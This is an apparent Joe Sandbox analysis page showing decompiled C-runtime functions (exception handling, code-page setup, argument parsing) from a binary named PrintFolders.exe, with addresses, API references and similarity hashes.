					 *((char*)(_t145 + _t81)) = 0;
				}
				_t133 = _v72;
				if(_t133 < 0x10) {
					L11:
					asm("movups xmm1, [ebp-0x38]");
					 *_t141 = 0x42e2d4;
					asm("movq xmm0, [ebp-0x28]");
					asm("movq [ebp-0x58], xmm0");
					asm("xorps xmm0, xmm0");
					asm("movd eax, xmm1");
					asm("movq [edi+0x4], xmm0");
					asm("movups [ebp-0x68], xmm1");
					_t121 =  >=  ? _t81 :  &_v116;
					_v52 = 0;
					_v48 = 0xf;
					_v68 = 0;
					_v40 =  >=  ? _t81 :  &_v116;
					_v36 = 1;
					E0040FF71( &_v40, _t141 + 4);
					_t134 = _v96;
					_t159 = _t159 + 8;
					 *_t141 = 0x42e320;
					if(_t134 < 0x10) {
						L15:
						 *_t141 = 0x439c98;
						 *((intOrPtr*)(_t141 + 0xc)) =  *((intOrPtr*)(_t111 + 0xc));
						 *((intOrPtr*)(_t141 + 0x10)) =  *((intOrPtr*)(_t111 + 0x10));
						 *[fs:0x0] = _v24;
						_pop(_t142);
						_pop(_t146);
						return E0040EBBF(_t141, _t111, _v32 ^ _t151,  *((intOrPtr*)(_t111 + 0x10)), _t142, _t146);
					} else {
						_t127 = _v116;
						_t136 = _t134 + 1;
						_t87 = _t127;
						if(_t136 < 0x1000) {
							L14:
							_push(_t136);
							E0040EDFF(_t127);
							goto L15;
						} else {
							_t127 =  *((intOrPtr*)(_t127 - 4));
							_t136 = _t136 + 0x23;
							if(_t87 - _t127 + 0xfffffffc > 0x1f) {
								goto L17;
							} else {
								goto L14;
							}
						}
					}
				} else {
					_t128 = _v92;
					_t137 = _t133 + 1;
					_t96 = _t128;
					if(_t137 < 0x1000) {
						L10:
						_push(_t137);
						_t81 = E0040EDFF(_t128);
						_t159 = _t159 + 8;
						goto L11;
					} else {
						_t127 =  *((intOrPtr*)(_t128 - 4));
						_t136 = _t137 + 0x23;
						if(_t96 - _t127 + 0xfffffffc > 0x1f) {
							E00413527(_t111, _t136, __eflags);
							L17:
							E00413527(_t111, _t136, __eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t151);
							_push(_t145);
							_t147 = _t127;
							 *_t147 = 0x42e2d4;
							E0040FFD4(_t147 + 4);
							__eflags = _v132 & 0x00000001;
							if((_v132 & 0x00000001) != 0) {
								_push(0x14);
								E0040EDFF(_t147);
							}
							return _t147;
						} else {
							goto L10;
						}
					}
				}
			}

0x00403b40
0x00403b41
0x00403b49
0x00403b50
0x00403b54
0x00403b56
0x00403b58
0x00403b63
0x00403b64
0x00403b65
0x00403b68
0x00403b6d
0x00403b6f
0x00403b73
0x00403b74
0x00403b78
0x00403b7e
0x00403b80
0x00403b8a
0x00403b8d
0x00403b95
0x00403b98
0x00403b9b
0x00403ba2
0x00403ba7
0x00403bb3
0x00403bdc
0x00403be8
0x00403bb5
0x00403bbb
0x00403bc6
0x00403bca
0x00403bce
0x00403bce
0x00403bb3
0x00403bf8
0x00403bfb
0x00403c06
0x00403c09
0x00403c10
0x00403c15
0x00403c18
0x00403c19
0x00403c1c
0x00403c43
0x00403c47
0x00403c4a
0x00403c4e
0x00403c1e
0x00403c25
0x00403c2b
0x00403c2f
0x00403c31
0x00403c32
0x00403c37
0x00403c3a
0x00403c3d
0x00403c3d
0x00403c53
0x00403c59
0x00403c87
0x00403c87
0x00403c8e
0x00403c94
0x00403c99
0x00403c9e
0x00403ca5
0x00403ca9
0x00403cae
0x00403cb2
0x00403cb5
0x00403cbf
0x00403cca
0x00403ccf
0x00403cd2
0x00403cd6
0x00403cdb
0x00403cde
0x00403ce1
0x00403cea
0x00403d14
0x00403d1c
0x00403d22
0x00403d25
0x00403d2b
0x00403d33
0x00403d34
0x00403d45
0x00403cec
0x00403cec
0x00403cef
0x00403cf0
0x00403cf8
0x00403d0a
0x00403d0a
0x00403d0c
0x00000000
0x00403cfa
0x00403cfa
0x00403cfd
0x00403d08
0x00000000
0x00000000
0x00000000
0x00000000
0x00403d08
0x00403cf8
0x00403c5b
0x00403c5b
0x00403c5e
0x00403c5f
0x00403c67
0x00403c7d
0x00403c7d
0x00403c7f
0x00403c84
0x00000000
0x00403c69
0x00403c69
0x00403c6c
0x00403c77
0x00403d48
0x00403d4d
0x00403d4d
0x00403d52
0x00403d53
0x00403d54
0x00403d55
0x00403d56
0x00403d57
0x00403d58
0x00403d59
0x00403d5a
0x00403d5b
0x00403d5c
0x00403d5d
0x00403d5e
0x00403d5f
0x00403d60
0x00403d63
0x00403d64
0x00403d69
0x00403d70
0x00403d78
0x00403d7c
0x00403d7e
0x00403d81
0x00403d86
0x00403d8d
0x00000000
0x00000000
0x00000000
0x00403c77
0x00403c67

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00403CD6
___std_exception_destroy.LIBVCRUNTIME ref: 00403D70

Strings

`=@, xrefs: 00403D1C

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy___std_exception_destroy
String ID: `=@
API String ID: 2970364248-2879527708
Opcode ID: 020cfde67c81afc4d71945b4c587ce0ffd10af12ed6690544abac246daa8197c
Instruction ID: 13c42e399c2991b93d131e87cfc8b99e3a8f7b3fd8cb1136b6e867019d48ab5a
Opcode Fuzzy Hash: 020cfde67c81afc4d71945b4c587ce0ffd10af12ed6690544abac246daa8197c
Instruction Fuzzy Hash: 1A718271A002589BDB04CF99C881BDDFBB5EF49314F14822EE805B7385D779AA44CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00419A5D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00419AED

Strings

pow, xrefs: 00419AC5, 00419AE2

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: a582e46973c46f5eef58ff1d0f172840d36d42b9c83d8389a540df618c71c77d
Instruction ID: 71e70a3d575cb920f3d1b965d95ae51b65b63d53711f17dc4a41893a615c4c2c
Opcode Fuzzy Hash: a582e46973c46f5eef58ff1d0f172840d36d42b9c83d8389a540df618c71c77d
Instruction Fuzzy Hash: 62517D71B0810195CB12BF14F9613AB77B0EB40B52F7448ABE4C5423A9EA3C8ED59A4E

Uniqueness

Uniqueness Score: -1.00%

Function 004248DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E004248DE(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				char _v28;
				signed int _v32;
				signed int _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t51;
				signed int _t55;
				int _t57;
				signed int _t60;
				signed int _t61;
				short _t64;
				signed char _t66;
				signed int _t67;
				signed char* _t75;
				signed char* _t76;
				int _t78;
				signed int _t83;
				signed char* _t84;
				short* _t85;
				signed int _t86;
				signed char _t87;
				signed int _t88;
				void* _t89;
				signed int _t90;
				signed int _t91;
				short _t92;
				signed int _t93;
				intOrPtr _t95;
				signed int _t96;

				_t89 = __edx;
				_t51 =  *0x43d054; // 0x7bd02ead
				_v8 = _t51 ^ _t96;
				_t95 = _a8;
				_t78 = E00424479(__eflags, _a4);
				if(_t78 == 0) {
					L36:
					E004244EA(_t95);
					goto L37;
				} else {
					_t92 = 0;
					_t83 = 0;
					_t57 = 0;
					_v32 = 0;
					while( *((intOrPtr*)(_t57 + 0x43d9a0)) != _t78) {
						_t83 = _t83 + 1;
						_t57 = _t57 + 0x30;
						_v32 = _t83;
						if(_t57 < 0xf0) {
							continue;
						} else {
							if(_t78 == 0xfde8) {
								L22:
								_t55 = _t57 | 0xffffffff;
							} else {
								_t57 = IsValidCodePage(_t78 & 0x0000ffff);
								if(_t57 == 0) {
									goto L22;
								} else {
									if(_t78 != 0xfde9) {
										_t13 =  &_v28; // 0x424731
										_t57 = GetCPInfo(_t78, _t13);
										__eflags = _t57;
										if(_t57 == 0) {
											__eflags =  *0x450cc0 - _t92; // 0x0
											if(__eflags != 0) {
												goto L36;
											} else {
												goto L22;
											}
										} else {
											_t14 = _t95 + 0x18; // 0x18
											E00410B00(_t92, _t14, _t92, 0x101);
											 *(_t95 + 4) = _t78;
											__eflags = _v28 - 2;
											 *((intOrPtr*)(_t95 + 0x21c)) = _t92;
											if(_v28 == 2) {
												__eflags = _v22;
												_t75 =  &_v22;
												if(_v22 != 0) {
													while(1) {
														_t87 = _t75[1];
														__eflags = _t87;
														if(_t87 == 0) {
															goto L18;
														}
														_t90 = _t87 & 0x000000ff;
														_t88 =  *_t75 & 0x000000ff;
														while(1) {
															__eflags = _t88 - _t90;
															if(_t88 > _t90) {
																break;
															}
															 *(_t95 + _t88 + 0x19) =  *(_t95 + _t88 + 0x19) | 0x00000004;
															_t88 = _t88 + 1;
															__eflags = _t88;
														}
														_t75 =  &(_t75[2]);
														__eflags =  *_t75;
														if( *_t75 != 0) {
															continue;
														}
														goto L18;
													}
												}
												L18:
												_t25 = _t95 + 0x1a; // 0x1a
												_t76 = _t25;
												_t86 = 0xfe;
												do {
													 *_t76 =  *_t76 | 0x00000008;
													_t76 =  &(_t76[1]);
													_t86 = _t86 - 1;
													__eflags = _t86;
												} while (_t86 != 0);
												 *((intOrPtr*)(_t95 + 0x21c)) = E0042443B( *(_t95 + 4));
												_t92 = 1;
											}
											goto L8;
										}
									} else {
										 *(_t95 + 4) = 0xfde9;
										 *((intOrPtr*)(_t95 + 0x21c)) = _t92;
										 *((intOrPtr*)(_t95 + 0x18)) = _t92;
										 *((short*)(_t95 + 0x1c)) = _t92;
										L8:
										 *((intOrPtr*)(_t95 + 8)) = _t92;
										_t12 = _t95 + 0xc; // 0xc
										_t92 = _t12;
										asm("stosd");
										asm("stosd");
										asm("stosd");
										L9:
										E0042454F(_t90, _t95);
										L37:
										_t55 = 0;
									}
								}
							}
						}
						goto L38;
					}
					_t28 = _t95 + 0x18; // 0x18
					E00410B00(_t92, _t28, _t92, 0x101);
					_t60 = _v32 * 0x30;
					__eflags = _t60;
					_v36 = _t60;
					_t61 = _t60 + 0x43d9b0;
					_v32 = _t61;
					do {
						__eflags =  *_t61;
						_t84 = _t61;
						if( *_t61 != 0) {
							while(1) {
								_t66 = _t84[1];
								__eflags = _t66;
								if(_t66 == 0) {
									break;
								}
								_t91 =  *_t84 & 0x000000ff;
								_t67 = _t66 & 0x000000ff;
								while(1) {
									__eflags = _t91 - _t67;
									if(_t91 > _t67) {
										break;
									}
									__eflags = _t91 - 0x100;
									if(_t91 < 0x100) {
										_t34 = _t92 + 0x43d998; // 0x8040201
										 *(_t95 + _t91 + 0x19) =  *(_t95 + _t91 + 0x19) |  *_t34;
										_t91 = _t91 + 1;
										__eflags = _t91;
										_t67 = _t84[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t84 =  &(_t84[2]);
								__eflags =  *_t84;
								if( *_t84 != 0) {
									continue;
								}
								break;
							}
							_t61 = _v32;
						}
						_t92 = _t92 + 1;
						_t61 = _t61 + 8;
						_v32 = _t61;
						__eflags = _t92 - 4;
					} while (_t92 < 4);
					 *(_t95 + 4) = _t78;
					 *((intOrPtr*)(_t95 + 8)) = 1;
					 *((intOrPtr*)(_t95 + 0x21c)) = E0042443B(_t78);
					_t46 = _t95 + 0xc; // 0xc
					_t85 = _t46;
					_t90 = _v36 + 0x43d9a4;
					_t93 = 6;
					do {
						_t64 =  *_t90;
						_t90 = _t90 + 2;
						 *_t85 = _t64;
						_t85 = _t85 + 2;
						_t93 = _t93 - 1;
						__eflags = _t93;
					} while (_t93 != 0);
					goto L9;
				}
				L38:
				return E0040EBBF(_t55, _t78, _v8 ^ _t96, _t89, _t92, _t95);
			}

0x004248de
0x004248e6
0x004248ed
0x004248f2
0x004248fe
0x00424903
0x00424ab9
0x00424aba
0x00000000
0x00424909
0x00424909
0x0042490b
0x0042490d
0x0042490f
0x00424912
0x0042491e
0x0042491f
0x00424922
0x0042492a
0x00000000
0x0042492c
0x00424932
0x00424a09
0x00424a09
0x00424938
0x0042493c
0x00424944
0x00000000
0x0042494a
0x00424951
0x00424979
0x0042497e
0x00424984
0x00424986
0x004249fd
0x00424a03
0x00000000
0x00000000
0x00000000
0x00000000
0x00424988
0x0042498d
0x00424992
0x0042499a
0x0042499d
0x004249a1
0x004249a7
0x004249a9
0x004249ad
0x004249b0
0x004249b2
0x004249b2
0x004249b5
0x004249b7
0x00000000
0x00000000
0x004249b9
0x004249bc
0x004249c7
0x004249c7
0x004249c9
0x00000000
0x00000000
0x004249c1
0x004249c6
0x004249c6
0x004249c6
0x004249cb
0x004249ce
0x004249d1
0x00000000
0x00000000
0x00000000
0x004249d1
0x004249b2
0x004249d3
0x004249d3
0x004249d3
0x004249d6
0x004249db
0x004249db
0x004249de
0x004249df
0x004249df
0x004249df
0x004249ee
0x004249f7
0x004249f7
0x00000000
0x004249a7
0x00424953
0x00424953
0x00424956
0x0042495c
0x0042495f
0x00424963
0x00424963
0x00424968
0x00424968
0x0042496b
0x0042496c
0x0042496d
0x0042496e
0x0042496f
0x00424abf
0x00424abf
0x00424ac1
0x00424951
0x00424944
0x00424932
0x00000000
0x0042492a
0x00424a16
0x00424a1b
0x00424a23
0x00424a23
0x00424a27
0x00424a2a
0x00424a30
0x00424a33
0x00424a33
0x00424a36
0x00424a38
0x00424a3a
0x00424a3a
0x00424a3d
0x00424a3f
0x00000000
0x00000000
0x00424a41
0x00424a44
0x00424a60
0x00424a60
0x00424a62
0x00000000
0x00000000
0x00424a49
0x00424a4f
0x00424a51
0x00424a57
0x00424a5b
0x00424a5b
0x00424a5c
0x00000000
0x00424a5c
0x00000000
0x00424a4f
0x00424a64
0x00424a67
0x00424a6a
0x00000000
0x00000000
0x00000000
0x00424a6a
0x00424a6c
0x00424a6c
0x00424a6f
0x00424a70
0x00424a73
0x00424a76
0x00424a76
0x00424a7c
0x00424a7f
0x00424a8e
0x00424a97
0x00424a97
0x00424a9c
0x00424aa2
0x00424aa3
0x00424aa3
0x00424aa6
0x00424aa9
0x00424aac
0x00424aaf
0x00424aaf
0x00424aaf
0x00000000
0x00424ab4
0x00424ac2
0x00424ad0

APIs

Part of subcall function 00424479: GetOEMCP.KERNEL32(00000000,004246EA,00000000,00418194,?,?,00418194,?,00000000), ref: 004244A4

IsValidCodePage.KERNEL32(-00000030,00000000,51F44589,?,?,?,00424731,?,00000000,00000000,?,?), ref: 0042493C
GetCPInfo.KERNEL32(00000000,1GB,?,?,00424731,?,00000000,00000000,?,?,?,?,?,?,00418194,?), ref: 0042497E

Strings

1GB, xrefs: 00424979, 0042497C

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: CodeInfoPageValid
String ID: 1GB
API String ID: 546120528-4244811723
Opcode ID: aee94ae5ee01cc59593c3c75f0455c1e87f97389cb9c7ba2e998998210576ad8
Instruction ID: aacb25a9507ad1c205b6f49fc7500e8a924766a2b9ce2c8cd014c0b8cff2f0c3
Opcode Fuzzy Hash: aee94ae5ee01cc59593c3c75f0455c1e87f97389cb9c7ba2e998998210576ad8
Instruction Fuzzy Hash: F55125B0B002648EDB21DF76E4407BBBBE4EFD1304F94406FD08687251D7789582CB49

Uniqueness

Uniqueness Score: -1.00%

Function 0042454F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0042454F(signed int __edx, char _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t60;
				signed int _t63;
				char _t68;
				signed char _t69;
				signed int _t70;
				signed int _t80;
				signed int _t81;
				char _t82;
				signed int _t85;
				signed char _t86;
				signed int _t87;
				signed int _t88;
				void* _t89;
				intOrPtr _t90;
				signed int _t91;

				_t88 = __edx;
				_t60 =  *0x43d054; // 0x7bd02ead
				_v8 = _t60 ^ _t91;
				_t2 =  &_a4; // 0x424974
				_t90 =  *_t2;
				if( *(_t90 + 4) == 0xfde9 || GetCPInfo( *(_t90 + 4),  &_v1820) == 0) {
					_t81 = 0;
					__eflags = 0;
					_t89 = 0x100;
					_t82 = 0;
					do {
						_t46 = _t82 - 0x61; // -97
						_t88 = _t46;
						_t47 = _t88 + 0x20; // -65
						__eflags = _t47 - 0x19;
						if(_t47 > 0x19) {
							__eflags = _t88 - 0x19;
							if(_t88 > 0x19) {
								_t63 = _t81;
							} else {
								 *(_t90 + _t82 + 0x19) =  *(_t90 + _t82 + 0x19) | 0x00000020;
								_t56 = _t82 - 0x20; // -32
								_t63 = _t56;
							}
						} else {
							 *(_t90 + _t82 + 0x19) =  *(_t90 + _t82 + 0x19) | 0x00000010;
							_t52 = _t82 + 0x20; // 0x20
							_t63 = _t52;
						}
						 *(_t90 + _t82 + 0x119) = _t63;
						_t82 = _t82 + 1;
						__eflags = _t82 - _t89;
					} while (_t82 < _t89);
					goto L26;
				} else {
					_t81 = 0;
					_t89 = 0x100;
					_t68 = 0;
					do {
						 *((char*)(_t91 + _t68 - 0x104)) = _t68;
						_t68 = _t68 + 1;
					} while (_t68 < 0x100);
					_t69 = _v1814;
					_t85 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t99 = _t69;
						if(_t69 == 0) {
							break;
						}
						_t88 =  *(_t85 + 1) & 0x000000ff;
						_t70 = _t69 & 0x000000ff;
						while(1) {
							__eflags = _t70 - _t88;
							if(_t70 > _t88) {
								break;
							}
							__eflags = _t70 - _t89;
							if(_t70 >= _t89) {
								break;
							}
							 *((char*)(_t91 + _t70 - 0x104)) = 0x20;
							_t70 = _t70 + 1;
							__eflags = _t70;
						}
						_t85 = _t85 + 2;
						__eflags = _t85;
						_t69 =  *_t85;
					}
					E00421875(_t99, _t81, 1,  &_v264, _t89,  &_v1800,  *(_t90 + 4), _t81);
					E004213EC(_t99, _t81,  *((intOrPtr*)(_t90 + 0x21c)), _t89,  &_v264, _t89,  &_v520, _t89,  *(_t90 + 4), _t81);
					E004213EC(_t99, _t81,  *((intOrPtr*)(_t90 + 0x21c)), 0x200,  &_v264, _t89,  &_v776, _t89,  *(_t90 + 4), _t81);
					_t80 = _t81;
					do {
						_t86 =  *(_t91 + _t80 * 2 - 0x704) & 0x0000ffff;
						if((_t86 & 0x00000001) == 0) {
							__eflags = _t86 & 0x00000002;
							if((_t86 & 0x00000002) == 0) {
								_t87 = _t81;
							} else {
								 *(_t90 + _t80 + 0x19) =  *(_t90 + _t80 + 0x19) | 0x00000020;
								_t87 =  *((intOrPtr*)(_t91 + _t80 - 0x304));
							}
						} else {
							 *(_t90 + _t80 + 0x19) =  *(_t90 + _t80 + 0x19) | 0x00000010;
							_t87 =  *((intOrPtr*)(_t91 + _t80 - 0x204));
						}
						 *(_t90 + _t80 + 0x119) = _t87;
						_t80 = _t80 + 1;
					} while (_t80 < _t89);
					L26:
					return E0040EBBF(_t63, _t81, _v8 ^ _t91, _t88, _t89, _t90);
				}
			}

0x0042454f
0x0042455a
0x00424561
0x00424566
0x00424566
0x00424571
0x00424683
0x00424683
0x00424685
0x0042468a
0x0042468c
0x0042468c
0x0042468c
0x0042468f
0x00424692
0x00424695
0x004246a1
0x004246a4
0x004246b2
0x004246a6
0x004246a9
0x004246ad
0x004246ad
0x004246ad
0x00424697
0x00424697
0x0042469c
0x0042469c
0x0042469c
0x004246b4
0x004246bb
0x004246bc
0x004246bc
0x00000000
0x0042458f
0x0042458f
0x00424591
0x00424596
0x00424598
0x00424598
0x0042459f
0x004245a0
0x004245a4
0x004245aa
0x004245b0
0x004245d8
0x004245d8
0x004245da
0x00000000
0x00000000
0x004245b9
0x004245bd
0x004245cf
0x004245cf
0x004245d1
0x00000000
0x00000000
0x004245c2
0x004245c4
0x00000000
0x00000000
0x004245c6
0x004245ce
0x004245ce
0x004245ce
0x004245d3
0x004245d3
0x004245d6
0x004245d6
0x004245f2
0x00424613
0x0042463b
0x00424643
0x00424645
0x00424645
0x00424650
0x00424660
0x00424663
0x00424673
0x00424665
0x00424665
0x0042466a
0x0042466a
0x00424652
0x00424652
0x00424657
0x00424657
0x00424675
0x0042467c
0x0042467d
0x004246c0
0x004246ce
0x004246ce

APIs

GetCPInfo.KERNEL32(0000FDE9,?,0000000C,00000000,00000000), ref: 00424581

Strings

, xrefs: 004245C6
tIB, xrefs: 00424566

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: Info
String ID: $tIB
API String ID: 1807457897-3257070604
Opcode ID: f173a03a340fb3b3c2833dae6a272a5206f12199cae729be784c9ef2206b4439
Instruction ID: 4a28d2029068e78a01aac7d99e26ab956f5ac8d9ba36b8a867b1e1f291c49a90
Opcode Fuzzy Hash: f173a03a340fb3b3c2833dae6a272a5206f12199cae729be784c9ef2206b4439
Instruction Fuzzy Hash: 54418E70704268ABDB218B18DD84BFB77FDDB96308FA404EEE5C687142D27C9A85CB54

Uniqueness

Uniqueness Score: -1.00%

Function 10006DF4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E10006DF4(void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				char* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char* _t26;
				intOrPtr* _t36;
				signed int _t37;
				signed int _t40;
				char _t42;
				signed int _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr _t48;
				signed int _t49;
				signed int _t54;
				void* _t57;
				intOrPtr* _t58;
				void* _t59;
				signed int _t64;
				signed int _t66;

				_t57 = __edx;
				_t48 = _a4;
				if(_t48 != 0) {
					__eflags = _t48 - 2;
					if(_t48 == 2) {
						L5:
						_push(_t59);
						E1000A0E5(_t48, _t59);
						E10009B2C(_t48, _t57, 0, 0x10017d98, 0, 0x10017d98, 0x104);
						_t26 =  *0x10018338; // 0x16b34c0
						 *0x10018328 = 0x10017d98;
						_v20 = _t26;
						__eflags = _t26;
						if(_t26 == 0) {
							L7:
							_t26 = 0x10017d98;
							_v20 = 0x10017d98;
							L8:
							_v8 = 0;
							_v16 = 0;
							_t64 = E1000709E(E10006F2A( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
							__eflags = _t64;
							if(__eflags != 0) {
								E10006F2A( &_v8, _v20, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
								__eflags = _t48 - 1;
								if(_t48 != 1) {
									_v12 = 0;
									_push( &_v12);
									_t49 = E10009A1F(_t64, _t64);
									__eflags = _t49;
									if(_t49 == 0) {
										_t58 = _v12;
										_t54 = 0;
										_t36 = _t58;
										__eflags =  *_t58;
										if( *_t58 == 0) {
											L17:
											_t37 = 0;
											 *0x1001832c = _t54;
											_v12 = 0;
											_t49 = 0;
											 *0x10018330 = _t58;
											L18:
											E10008701(_t37);
											_v12 = 0;
											L19:
											E10008701(_t64);
											_t40 = _t49;
											L20:
											return _t40;
										} else {
											goto L16;
										}
										do {
											L16:
											_t36 = _t36 + 4;
											_t54 = _t54 + 1;
											__eflags =  *_t36;
										} while ( *_t36 != 0);
										goto L17;
									}
									_t37 = _v12;
									goto L18;
								}
								_t42 = _v8 - 1;
								__eflags = _t42;
								 *0x1001832c = _t42;
								_t43 = _t64;
								_t64 = 0;
								 *0x10018330 = _t43;
								L12:
								_t49 = 0;
								goto L19;
							}
							_t44 = E10006406(__eflags);
							_push(0xc);
							_pop(0);
							 *_t44 = 0;
							goto L12;
						}
						__eflags =  *_t26;
						if( *_t26 != 0) {
							goto L8;
						}
						goto L7;
					}
					__eflags = _t48 - 1;
					if(__eflags == 0) {
						goto L5;
					}
					_t45 = E10006406(__eflags);
					_t66 = 0x16;
					 *_t45 = _t66;
					E1000632C();
					_t40 = _t66;
					goto L20;
				}
				return 0;
			}

0x10006df4
0x10006dfd
0x10006e02
0x10006e0c
0x10006e0f
0x10006e2c
0x10006e2c
0x10006e2d
0x10006e40
0x10006e45
0x10006e4d
0x10006e53
0x10006e56
0x10006e58
0x10006e5f
0x10006e5f
0x10006e61
0x10006e64
0x10006e67
0x10006e6e
0x10006e87
0x10006e8c
0x10006e8e
0x10006eaf
0x10006eb7
0x10006eba
0x10006ed5
0x10006ed8
0x10006edf
0x10006ee3
0x10006ee5
0x10006eec
0x10006eef
0x10006ef1
0x10006ef3
0x10006ef5
0x10006eff
0x10006eff
0x10006f01
0x10006f07
0x10006f0a
0x10006f0c
0x10006f12
0x10006f13
0x10006f19
0x10006f1c
0x10006f1d
0x10006f23
0x10006f26
0x00000000
0x00000000
0x00000000
0x00000000
0x10006ef7
0x10006ef7
0x10006ef7
0x10006efa
0x10006efb
0x10006efb
0x00000000
0x10006ef7
0x10006ee7
0x00000000
0x10006ee7
0x10006ebf
0x10006ebf
0x10006ec0
0x10006ec5
0x10006ec7
0x10006ec9
0x10006ece
0x10006ece
0x00000000
0x10006ece
0x10006e90
0x10006e95
0x10006e97
0x10006e98
0x00000000
0x10006e98
0x10006e5a
0x10006e5d
0x00000000
0x00000000
0x00000000
0x10006e5d
0x10006e11
0x10006e14
0x00000000
0x00000000
0x10006e16
0x10006e1d
0x10006e1e
0x10006e20
0x10006e25
0x00000000
0x10006e25
0x00000000

Strings

C:\Program Files (x86)\PrintFolders\PrintFolders.exe, xrefs: 10006E37, 10006E74

Memory Dump Source

Source File: 00000002.00000002.326460873.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.326456208.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326476703.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326484657.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326522758.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_PrintFolders.jbxd

Similarity

API ID:
String ID: C:\Program Files (x86)\PrintFolders\PrintFolders.exe
API String ID: 0-2080567260
Opcode ID: 1ece5218b2422689d95aac8363c4354a6b0412c233e2753c981cf0bd8d1cf806
Instruction ID: 646097fc6b5d669f55448d5f467022a3e50ec9bcd71d7e0a9af30093925523d1
Opcode Fuzzy Hash: 1ece5218b2422689d95aac8363c4354a6b0412c233e2753c981cf0bd8d1cf806
Instruction Fuzzy Hash: 8A41AF79E00295AFEB21CB99DC8199EBBFAEB897D0B304066F90497205D7719F41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0041A2ED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0041A2ED(void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				char* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t26;
				intOrPtr* _t36;
				signed int _t37;
				signed int _t40;
				char _t42;
				signed int _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr _t48;
				signed int _t49;
				signed int _t54;
				void* _t57;
				intOrPtr* _t58;
				signed int _t64;
				signed int _t66;

				_t57 = __edx;
				_t48 = _a4;
				if(_t48 != 0) {
					__eflags = _t48 - 2;
					if(_t48 == 2) {
						L5:
						E00424883(_t48);
						E004242CA(_t48, _t57, 0, 0x450790, 0, 0x450790, 0x104);
						_t26 =  *0x450cd8; // 0x16b34c0
						 *0x450cc8 = 0x450790;
						_v20 = _t26;
						__eflags = _t26;
						if(_t26 == 0) {
							L7:
							_t26 = 0x450790;
							_v20 = 0x450790;
							L8:
							_v8 = 0;
							_v16 = 0;
							_t64 = E0041A597(E0041A423( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
							__eflags = _t64;
							if(__eflags != 0) {
								E0041A423( &_v8, _v20, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
								__eflags = _t48 - 1;
								if(_t48 != 1) {
									_v12 = 0;
									_push( &_v12);
									_t49 = E004241F8(_t64, _t64);
									__eflags = _t49;
									if(_t49 == 0) {
										_t58 = _v12;
										_t54 = 0;
										_t36 = _t58;
										__eflags =  *_t58;
										if( *_t58 == 0) {
											L17:
											_t37 = 0;
											 *0x450ccc = _t54;
											_v12 = 0;
											_t49 = 0;
											 *0x450cd0 = _t58;
											L18:
											E0041E2B8(_t37);
